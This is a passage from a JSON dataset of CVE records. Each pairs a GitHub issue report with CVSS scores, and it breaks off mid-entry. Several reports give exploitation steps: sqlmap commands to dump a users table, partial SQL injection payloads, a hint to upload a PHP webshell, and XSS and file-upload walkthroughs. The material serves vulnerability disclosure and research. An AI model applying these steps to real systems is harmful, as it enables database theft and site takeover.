  80946. "description": "There are multiple reflective XSS vulnerabilities in the website. Vulnerability APITAG XSS Vulnerability APITAG risk Affected APITAG Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat Verification process\uff1a Get administrator cookies through reflective XSS\uff1a First, the user logs in to the background FILETAG Then we make a payad that can get cookies by using the vulnerable APITAG it to the victim or make it run by other means. For example, here I choose this URL\uff1a FILETAG Other URLs are the same\uff1a FILETAG FILETAG Repair method NUMBERTAG HTML escape the input data so that it is not recognized as an executable script APITAG the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)",
  80947. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  80948. "severity": "MEDIUM",
  80949. "baseScore": 6.1,
  80950. "impactScore": 2.7,
  80951. "exploitabilityScore": 2.8
  80952. },
  80953. {
  80954. "CVE_ID": "CVE-2022-26605",
  80955. "Issue_Url_old": "https://github.com/Chu1z1/Chuizi/issues/1",
  80956. "Issue_Url_new": "https://github.com/chu1z1/chuizi/issues/1",
  80957. "Repo_new": "chu1z1/chuizi",
  80958. "Issue_Created_At": "2022-03-03T09:57:08Z",
  80959. "description": "APITAG APITAG APITAG Any file download. APITAG APITAG APITAG Any file download \u9700\u8981\u767b\u9646\u5230\u5fb7\u5b9e\u4efb\u610f\u7528\u6237\u624d\u53ef\u4ee5\u5229\u7528 Users need to log in to exploit the vulnerability You can find the interface at the avatar upload to obtain the key generated by the uploaded file path, modify the path of the generated key to generate a malicious key, and import the key at the avatar file reading, resulting in arbitrary file download APITAG \u7528\u6237\u754c\u9762 UI FILETAG \u4e0a\u4f20\u6587\u4ef6 Upload file FILETAG \u53ef\u4ee5\u4fee\u6539\u8fd4\u56de\u8def\u5f84\u4e5f\u53ef\u4ee5\u66f4\u6539\u4e0b\u4e00\u4e2a\u5305\u7684\u8def\u5f84\u83b7\u53d6key You can modify the return path or change the path of the next package to obtain the key FILETAG FILETAG APITAG \u6f0f\u6d1e\u5229\u7528\u6210\u529f Successful exploit FILETAG APITAG Do not infiltrate illegally! Do not penetrate without authorization! Please do not use this vulnerability for illegal and criminal activities! This article is for learning only! The consequences of breaking the law have nothing to do with the author!",
  80960. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  80961. "severity": "HIGH",
  80962. "baseScore": 8.8,
  80963. "impactScore": 5.9,
  80964. "exploitabilityScore": 2.8
  80965. },
  80966. {
  80967. "CVE_ID": "CVE-2022-26607",
  80968. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/9",
  80969. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/9",
  80970. "Repo_new": "baigostudio/baigocms",
  80971. "Issue_Created_At": "2022-03-03T09:35:22Z",
  80972. "description": "FILETAG NUMBERTAG Upload webshell . It is recommended to use one sentence webshell . E.g : <?php APITAG FILETAG Splicing website path \uff1a http:// FILETAG FILETAG APITAG FILETAG FILETAG",
  80973. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  80974. "severity": "HIGH",
  80975. "baseScore": 7.2,
  80976. "impactScore": 5.9,
  80977. "exploitabilityScore": 1.2
  80978. },
  80979. {
  80980. "CVE_ID": "CVE-2022-26613",
  80981. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/14",
  80982. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/14",
  80983. "Repo_new": "harshitbansal373/php-cms",
  80984. "Issue_Created_At": "2022-03-03T15:50:07Z",
  80985. "description": "SQL injection in categorymenu page. Description I found a SQL inject vulnerability in page FILETAG and I build a local environment to test it. The url is FILETAG FILETAG The problem code is here. CODETAG Users can control the parameter \"category\" by GET method without any filter,and get something that shouldn't have been APITAG as,if \"category\" is changed like NUMBERTAG union select APITAG will get the database user: FILETAG Proof I use the sqlmap to do this. APITAG database information. sqlmap u URLTAG dbs FILETAG APITAG a database and get table information sqlmap u URLTAG D cms tables FILETAG APITAG a table and get the columns sqlmap u URLTAG D cms T users columns FILETAG APITAG the columns and get column contents. sqlmap u URLTAG D cms T users C username dump FILETAG Solution You can fix it by add some filter rules on the parameter \"category\",such as ban the letter characters.",
  80986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80987. "severity": "CRITICAL",
  80988. "baseScore": 9.8,
  80989. "impactScore": 5.9,
  80990. "exploitabilityScore": 3.9
  80991. },
  80992. {
  80993. "CVE_ID": "CVE-2022-26613",
  80994. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/15",
  80995. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/15",
  80996. "Repo_new": "harshitbansal373/php-cms",
  80997. "Issue_Created_At": "2022-04-11T12:03:05Z",
  80998. "description": "Multiple SQLi. Hello, dear, web developer! You have serious problems, dear web developer! Multiple SQLi STATUS Critical! =) Dude, you must delete this project, please! What kind of web developer are you? \ud83d\ude32 Infected apps : CODETAG Payloads: ERRORTAG Dump: ERRORTAG BR MENTIONTAG Penetration Testing Engineer",
  80999. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81000. "severity": "CRITICAL",
  81001. "baseScore": 9.8,
  81002. "impactScore": 5.9,
  81003. "exploitabilityScore": 3.9
  81004. },
  81005. {
  81006. "CVE_ID": "CVE-2022-26619",
  81007. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1702",
  81008. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1702",
  81009. "Repo_new": "halo-dev/halo",
  81010. "Issue_Created_At": "2022-03-04T10:30:01Z",
  81011. "description": "Halo Blog APITAG Fileupload without file type authentication NUMBERTAG APITAG NUMBERTAG Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 URLTAG \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f The vulnerability can lead to the upload of arbitrary malicious script files. \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa shell no \u9644\u52a0\u4fe1\u606f Black box penetration NUMBERTAG Use (demo:P APITAG to login in URLTAG ,and then find the attachment upload feature ,try to upload a random image. FILETAG NUMBERTAG While uploading a random image, use burp suite to catch the request packet and forward it to the Repeater module. FILETAG NUMBERTAG You can tell we successfully uploaded the image from the screenshot below . And we can also get the path of the image accordding to the response. FILETAG NUMBERTAG Now we want to use the feature again. This time ,try to change the file suffix and modify the file content at the same time. After doing that , send the request again. And the upload is still successful , the file path is also returned. FILETAG NUMBERTAG Now try to access the file path within the url below,and our xss payload successfully executed FILETAG NUMBERTAG Screenshots of other file types uploaded are as follows\uff1a FILETAG FILETAG Source code review\uff1a Try to download the source code for source code security analysis FILETAG APITAG version NUMBERTAG FILETAG NUMBERTAG Check the source code and locate the class PATHTAG According to the annotations of this class, you can find that all requests to the path PATHTAG will access this class. FILETAG NUMBERTAG The /upload path accessed by the upload interface will access the APITAG method of this class. FILETAG NUMBERTAG As you can see, this method receives the file from the client side, then passes the file object as an argument to the APITAG method of the APITAG class and executes it, and then executes the result as an argument to the APITAG method of the APITAG class NUMBERTAG So let's follow up on the APITAG method first after locating the PATHTAG class and dive into the APITAG method FILETAG NUMBERTAG You can see that the code does not have any file suffix checksum, and finally the APITAG method will return a create(attachment) object, continue to follow up to the APITAG method, you can see that an Attachment class object is returned, and there is no file checksum. FILETAG NUMBERTAG The returned object is entered as an argument to the APITAG method of the PATHTAG class, in which you can see that the code writes the path of the uploaded file to the APITAG instance object, and it can be found that there is no logic of permission checking, and finally the method returns an APITAG instance object. FILETAG NUMBERTAG When the file path is set, this information will be brought into the response packet and eventually fed back to the client, so we can successfully access the uploaded file in the response packet based on this path information NUMBERTAG According to the analysis of the above code, we can see that there is no logic in the code to check the file suffix, file content and file format, so it can lead to arbitrary file upload\u3002",
  81012. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  81013. "severity": "HIGH",
  81014. "baseScore": 7.5,
  81015. "impactScore": 3.6,
  81016. "exploitabilityScore": 3.9
  81017. },
  81018. {
  81019. "CVE_ID": "CVE-2022-26630",
  81020. "Issue_Url_old": "https://github.com/guodongtech/jellycms/issues/1",
  81021. "Issue_Url_new": "https://github.com/guodongtech/jellycms/issues/1",
  81022. "Repo_new": "guodongtech/jellycms",
  81023. "Issue_Created_At": "2022-03-05T08:07:50Z",
  81024. "description": "Jellycms background has any file download vulnerability . Vulnerability file address: PATHTAG FILETAG User can change the param APITAG to download any files. User use the packdownload functions in Database management,then change the APITAG likes PATHTAG package likes this: APITAG then the user can download the zip file,unpack the file to get the config file contents.",
  81025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  81026. "severity": "HIGH",
  81027. "baseScore": 8.8,
  81028. "impactScore": 5.9,
  81029. "exploitabilityScore": 2.8
  81030. },
  81031. {
  81032. "CVE_ID": "CVE-2022-26967",
  81033. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2138",
  81034. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2138",
  81035. "Repo_new": "gpac/gpac",
  81036. "Issue_Created_At": "2022-03-10T09:47:43Z",
  81037. "description": "FILETAG Acknowledgement FILETAG",
  81038. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81039. "severity": "HIGH",
  81040. "baseScore": 7.8,
  81041. "impactScore": 5.9,
  81042. "exploitabilityScore": 1.8
  81043. },
  81044. {
  81045. "CVE_ID": "CVE-2022-26981",
  81046. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1171",
  81047. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1171",
  81048. "Repo_new": "liblouis/liblouis",
  81049. "Issue_Created_At": "2022-03-04T08:53:12Z",
  81050. "description": "FILETAG POC FILETAG",
  81051. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81052. "severity": "HIGH",
  81053. "baseScore": 7.8,
  81054. "impactScore": 5.9,
  81055. "exploitabilityScore": 1.8
  81056. },
  81057. {
  81058. "CVE_ID": "CVE-2022-27007",
  81059. "Issue_Url_old": "https://github.com/nginx/njs/issues/469",
  81060. "Issue_Url_new": "https://github.com/nginx/njs/issues/469",
  81061. "Repo_new": "nginx/njs",
  81062. "Issue_Created_At": "2022-02-15T08:42:02Z",
  81063. "description": "Patch bypass for njs_await_fulfilled, causing UAF again. This UAF was introduced in a patch for a similar bug NUMBERTAG which shows that njs_await_fulfilled is still flawed. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit p1umer( APITAG",
  81064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81065. "severity": "CRITICAL",
  81066. "baseScore": 9.8,
  81067. "impactScore": 5.9,
  81068. "exploitabilityScore": 3.9
  81069. },
  81070. {
  81071. "CVE_ID": "CVE-2022-27008",
  81072. "Issue_Url_old": "https://github.com/nginx/njs/issues/471",
  81073. "Issue_Url_new": "https://github.com/nginx/njs/issues/471",
  81074. "Repo_new": "nginx/njs",
  81075. "Issue_Created_At": "2022-02-15T09:26:33Z",
  81076. "description": "SEGV APITAG in njs_array_add. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  81077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  81078. "severity": "HIGH",
  81079. "baseScore": 7.5,
  81080. "impactScore": 3.6,
  81081. "exploitabilityScore": 3.9
  81082. },
  81083. {
  81084. "CVE_ID": "CVE-2022-27041",
  81085. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/248",
  81086. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/248",
  81087. "Repo_new": "os4ed/opensis-classic",
  81088. "Issue_Created_At": "2022-03-07T15:07:24Z",
  81089. "description": "SQL Injection in PATHTAG Due to lack of protection, parameter APITAG in PATHTAG can be abused to injection SQL queries to extract information from databases. POC: Type: boolean based blind Title: Boolean based blind Parameter replace (original value) Payload: PATHTAG (SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END))&ajax=true Type: time based blind Title: APITAG NUMBERTAG AND time based blind (heavy query) Payload: PATHTAG AND APITAG Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: PATHTAG UNION ALL SELECT APITAG &ajax=true FILETAG Traceback: PATHTAG Solution: Use function APITAG before assign $_REQUEST FILETAG",
  81090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  81091. "severity": "HIGH",
  81092. "baseScore": 7.5,
  81093. "impactScore": 3.6,
  81094. "exploitabilityScore": 3.9
  81095. },
  81096. {
  81097. "CVE_ID": "CVE-2022-27044",
  81098. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/156",
  81099. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/156",
  81100. "Repo_new": "saitoha/libsixel",
  81101. "Issue_Created_At": "2021-09-01T11:17:40Z",
  81102. "description": "heap buffer overflow in PATHTAG Hi,I found a heap buffer overflow in the current master NUMBERTAG a5be8b URLTAG I build APITAG with ASAN ,this is ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG It happens in: URLTAG when NUMBERTAG y NUMBERTAG width NUMBERTAG then gdb info: FILETAG In this position,[r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG So,writing to data will cause overflow and then it writes to a location (chunk) in the heap that should not be written to. heap info: Before: CODETAG After: CODETAG",
  81103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81104. "severity": "HIGH",
  81105. "baseScore": 8.8,
  81106. "impactScore": 5.9,
  81107. "exploitabilityScore": 2.8
  81108. },
  81109. {
  81110. "CVE_ID": "CVE-2022-27046",
  81111. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/157",
  81112. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/157",
  81113. "Repo_new": "saitoha/libsixel",
  81114. "Issue_Created_At": "2021-09-14T12:18:43Z",
  81115. "description": "heap use after free in PATHTAG Hi,I found a heap use after free in the current master NUMBERTAG a5be8b URLTAG I build img2sixel with ASAN,this is ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG",
  81116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81117. "severity": "HIGH",
  81118. "baseScore": 8.8,
  81119. "impactScore": 5.9,
  81120. "exploitabilityScore": 2.8
  81121. },
  81122. {
  81123. "CVE_ID": "CVE-2022-27047",
  81124. "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/62",
  81125. "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/62",
  81126. "Repo_new": "moxi624/mogu_blog_v2",
  81127. "Issue_Created_At": "2022-03-08T07:21:56Z",
  81128. "description": "mogu_blog NUMBERTAG backend Management System has an vulnerability of uploading arbitrary files. APITAG box pentesting Using mogu NUMBERTAG mogu NUMBERTAG to log in the mogu_blog NUMBERTAG backend Management System. FILETAG Find the Blog Management Blog Management Local file Upload feature . FILETAG Click this blue button to select a local image for uploading, and then click the green button to put the image to server side FILETAG At this point, use the burp suite to capture the request packet. FILETAG and then forward it to the Repeater module. Try to send a request to upload a normal image and you can see that the image was uploaded successfully. And the response packet returns the address information of the image. FILETAG Splice the address in the response packet with the url to try to access the image we just uploaded . The whole url : FILETAG You can see the successful access to the uploaded image. FILETAG Back in the burp suite, try changing the contents of the file in the request package to xss payload\uff0cas well as trying to change the file name to an html suffix. FILETAG You can see the successful upload and the file path in the response package. Splice the file path to the url and open a new browser (without admin PATHTAG ) to try to access it. The whole url : FILETAG FILETAG You can see that the xss payload was successfully executed and that there is an arbitrary file to upload. Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded. jsp: FILETAG php: FILETAG cpp: FILETAG APITAG box pentest Based on the url of the image upload request ( PATHTAG ), we can tell that the class that handles the image upload function is located in the /mogu picture subproject FILETAG FILETAG According to the request url ( PATHTAG ) continue to locate the APITAG class PATHTAG FILETAG With APITAG you can see that all requests for the /file path will be processed by this class And requests for the /file/pictures path are handled by the APITAG method of this class FILETAG This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file This method then calls the APITAG method of the APITAG class instance object FILETAG Follow up in the APITAG method of the APITAG class to see its source code FILETAG The first part of the code is to get some files and system base information, none of which is file checked Continuing to follow up to the code for file uploads, You can see that there is no strict verification of the uploaded file extension, file content, or file format FILETAG The next code execution reaches the try /catch {} block, which involves the APITAG method of the APITAG class FILETAG Going deeper into this method leads to the APITAG method. FILETAG You can see that the file suffix, file format and file content are still not strictly verified. Back in the APITAG method of the APITAG class, After checking the code after , not only the code for uploading the APITAG server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified. Finally, in the APITAG method of the APITAG class, the following code will be executed. FILETAG Set the information of the uploaded file to some settings. Then save and upload feedback to the client response file. The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files. This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.",
  81129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81130. "severity": "CRITICAL",
  81131. "baseScore": 9.8,
  81132. "impactScore": 5.9,
  81133. "exploitabilityScore": 3.9
  81134. },
  81135. {
  81136. "CVE_ID": "CVE-2022-27055",
  81137. "Issue_Url_old": "https://github.com/ecjia/ecjia-daojia/issues/20",
  81138. "Issue_Url_new": "https://github.com/ecjia/ecjia-daojia/issues/20",
  81139. "Repo_new": "ecjia/ecjia-daojia",
  81140. "Issue_Created_At": "2022-03-08T11:32:51Z",
  81141. "description": "information leakage. FILETAG file line NUMBERTAG creates the .env file Content APITAG = APITAG . DIRECTORY_SEPARATOR . '.env'; Its content is to create a .env file in the root directory and write the database account, password, and database name",
  81142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  81143. "severity": "HIGH",
  81144. "baseScore": 7.5,
  81145. "impactScore": 3.6,
  81146. "exploitabilityScore": 3.9
  81147. },
  81148. {
  81149. "CVE_ID": "CVE-2022-27103",
  81150. "Issue_Url_old": "https://github.com/element-plus/element-plus/issues/6514",
  81151. "Issue_Url_new": "https://github.com/element-plus/element-plus/issues/6514",
  81152. "Repo_new": "element-plus/element-plus",
  81153. "Issue_Created_At": "2022-03-10T07:47:54Z",
  81154. "description": "Bug Report] APITAG [table column] table column \u4e2d\u5bf9\u4e8e \u5c5e\u6027 show overflow tooltip \u5904\u7406\u5b58\u5728\u95ee\u9898 \u53ef\u4ee5\u5bfc\u81f4 XSS. APITAG Bug Type: Component Environment Vue Version: APITAG Element Plus Version: APITAG Browser / OS: APITAG Build Tool: Vue CLI Reproduction Related Component APITAG Reproduction Link APITAG Repo URLTAG Steps to reproduce \u6309\u7167 \u590d\u73b0\u9879\u76ee\u7684 readme \u8fdb\u884c\u6784\u5efa \u8bbf\u95ee serve \u5728 \u542b\u6709 payload \u7684 address \u7684\u5217\u5904\u4e2d\u5212\u8fc7\u5149\u6807 \u5c31\u53ef\u4ee5\u89e6\u53d1 js \u8fd0\u884c\u5bfc\u81f4 xss What is Expected? \u6e32\u67d3img\u6216\u8005\u4e0d\u6e32\u67d3\u90fd\u53ef\u4ee5 \u4f46\u4e0d\u53ef\u4ee5\u6267\u884c APITAG What is actually happening? \u6e32\u67d3\u6587\u672c\u5185\u5bb9\u4e3a html \u5e76\u4e14\u6267\u884c APITAG \u811a\u672c Additional comments elementui plus \u662f\u4e00\u4e2a\u5927\u4ed3\u5e93\u5bfc\u81f4\u6709\u8bb8\u8bb8\u591a\u591a\u7684\u524d\u7aef\u9879\u76ee\u4f9d\u8d56\u5176\u800c\u6784\u5efa show overflow tooltip \u5df2\u7ecf\u53ef\u4ee5\u901a\u8fc7 github \u4ee3\u7801\u641c\u7d22 \u627e\u5230\u76f8\u5173\u9879\u76ee \u5e76\u4e14\u5176\u4e2d\u5305\u542b\u4e00\u4e9b\u90e8\u5206\u540e\u53f0\u7ba1\u7406\u9879\u76ee \u5efa\u8bae\u901a\u77e5\u5f00\u53d1\u8005 \u66f4\u65b0\u9879\u76ee\u4e0e\u4fee\u590d\u8be5\u95ee\u9898 \u6b64\u5916\u6587\u6863\u4e2d\u5efa\u8bae\u6dfb\u52a0\u76f8\u5173 \u5b89\u5168\u8b66\u544a \u5176\u4ed6\u76f8\u5173\u4fe1\u606f: URLTAG Reporter: MENTIONTAG MENTIONTAG APITAG",
  81155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81156. "severity": "MEDIUM",
  81157. "baseScore": 6.1,
  81158. "impactScore": 2.7,
  81159. "exploitabilityScore": 2.8
  81160. },
  81161. {
  81162. "CVE_ID": "CVE-2022-27103",
  81163. "Issue_Url_old": "https://github.com/asjdf/element-table-xss-test/issues/1",
  81164. "Issue_Url_new": "https://github.com/asjdf/element-table-xss-test/issues/1",
  81165. "Repo_new": "asjdf/element-table-xss-test",
  81166. "Issue_Created_At": "2022-03-10T06:13:23Z",
  81167. "description": "vuln location seems like there.. URLTAG They render the html as the code. All Frontend Program used show overflow tooltips = true attr and concat the backend feedback into this column seems has this problem. and morse over triggerred XSS",
  81168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81169. "severity": "MEDIUM",
  81170. "baseScore": 6.1,
  81171. "impactScore": 2.7,
  81172. "exploitabilityScore": 2.8
  81173. },
  81174. {
  81175. "CVE_ID": "CVE-2022-27107",
  81176. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1176",
  81177. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1176",
  81178. "Repo_new": "orangehrm/orangehrm",
  81179. "Issue_Created_At": "2022-03-10T13:56:32Z",
  81180. "description": "Stored XSS in the APITAG Video\" section under APITAG via the GET/POST APITAG APITAG parameter. Environment details APITAG version NUMBERTAG APITAG source: Release build from APITAG URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug In order to share a video, a user provides the URL in the APITAG Video\" feature under APITAG A GET request is then sent to the PATHTAG endpoint with the url as a parameter. The application's backend then validates the url against a whitelist of domains and sends an appropriate response. If the domain in the url is in the whitelist, the application creates an iframe element and embeds the video link in it. The user then submits the post by clicking the APITAG Video\" button. The APITAG page, including the newly posted video, is sent back in the response body. The initial whitelist based validation can be bypassed by sending a request, like the above, containing any arbitrary URL in the APITAG parameter. The value of this parameter is injected into the iframe's src attribute. Due to this, it is possible to inject the javascript: pseudo protocol and gain arbitrary APITAG execution in the browser of anyone who visits the APITAG page. For example, the string APITAG can be passed as the value of the APITAG parameter. When a user visits the APITAG page, the payload will be interpreted as APITAG and get executed so an alert will pop up with the domain hosting the application at that instance. To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to APITAG > APITAG Video NUMBERTAG Paste any youtube.com video link NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG video NUMBERTAG Replace the value in the POST parameter APITAG to APITAG and click on APITAG in Burp NUMBERTAG Turn off Intercept in Burp NUMBERTAG Navigate to APITAG NUMBERTAG Notice that an alert will pop up with the Domain value of the application's server printed which means the payload we injected into the APITAG parameter is interpreted as valid Javascript and is executed. Expected behavior The value of the APITAG parameter is validated by the application's backend and an error is thrown. What do you see instead: The post gets uploaded successfully. Screenshots FILETAG FILETAG",
  81181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81182. "severity": "MEDIUM",
  81183. "baseScore": 5.4,
  81184. "impactScore": 2.7,
  81185. "exploitabilityScore": 2.3
  81186. },
  81187. {
  81188. "CVE_ID": "CVE-2022-27108",
  81189. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1173",
  81190. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1173",
  81191. "Repo_new": "orangehrm/orangehrm",
  81192. "Issue_Created_At": "2022-03-10T13:56:23Z",
  81193. "description": "Insecure Direct Object Reference (IDOR) via the end point APITAG allows any user can create a timesheet in another user's account. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug A user can create a timesheet for a specific week by using the APITAG Timesheet\" functionality, after which the timesheet is accessible for editing and submission under the dropdown menu. It was observed that when the APITAG parameter was set to any valid user's employee ID, a timesheet was created in that employee's account. The application verifies if a user has a valid session, but does not verify if a user is authorised to create a timesheet for a different APITAG . It is also possible to find out whether a timesheet has already been created for a specific week, by analysing the HTTP response. To Reproduce NUMBERTAG Login to the APITAG application as user A with APITAG as APITAG NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on APITAG Timesheet NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on the textbox and select any date, say NUMBERTAG Click on \"Ok NUMBERTAG Go to the Burp Intercept tab and you will notice a GET request being made to the APITAG endpoint NUMBERTAG Modify the value of APITAG parameter to a user B's APITAG , APITAG NUMBERTAG Click on Forward and turn off Intercept NUMBERTAG Login to user B's account NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on the dropdown menu beside APITAG for Week NUMBERTAG Notice that a new entry has been created with the date NUMBERTAG Expected behavior APITAG required\" error. What do you see instead: The response body contains the date of the entry NUMBERTAG Screenshots FILETAG FILETAG",
  81194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  81195. "severity": "MEDIUM",
  81196. "baseScore": 4.3,
  81197. "impactScore": 1.4,
  81198. "exploitabilityScore": 2.8
  81199. },
  81200. {
  81201. "CVE_ID": "CVE-2022-27109",
  81202. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1174",
  81203. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1174",
  81204. "Repo_new": "orangehrm/orangehrm",
  81205. "Issue_Created_At": "2022-03-10T13:56:26Z",
  81206. "description": "Referer header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug This is similar to the Host header injection redirect vulnerability, except the issue lies in the Referer header and the vulnerable endpoints are different . To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Attachment\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Select any PNG file and Click on APITAG NUMBERTAG Change the value of the Referer header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A NUMBERTAG redirect to the malicious domain. Screenshots FILETAG",
  81207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81208. "severity": "MEDIUM",
  81209. "baseScore": 5.4,
  81210. "impactScore": 2.7,
  81211. "exploitabilityScore": 2.3
  81212. },
  81213. {
  81214. "CVE_ID": "CVE-2022-27110",
  81215. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1175",
  81216. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1175",
  81217. "Repo_new": "orangehrm/orangehrm",
  81218. "Issue_Created_At": "2022-03-10T13:56:28Z",
  81219. "description": "Host header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug When an authenticated user submits the APITAG Details\" form, a NUMBERTAG redirect to the APITAG Details\" URL is sent in the response. Following is a request and its response\u2014 CODETAG Response: CODETAG It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the NUMBERTAG response. A user would then be redirected to the arbitrary domain. For example, the domain APITAG can be passed as the value of the Host header in the POST request. The resulting NUMBERTAG response redirects the user to URLTAG Due to the nature of this vulnerability, it can be used in phishing attacks. Following are the endpoints in the APITAG application that are vulnerable to the Host Header Injection Redirect vulnerability NUMBERTAG PATHTAG NUMBERTAG PATHTAG To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Details\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG NUMBERTAG Change the value of the Host header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A 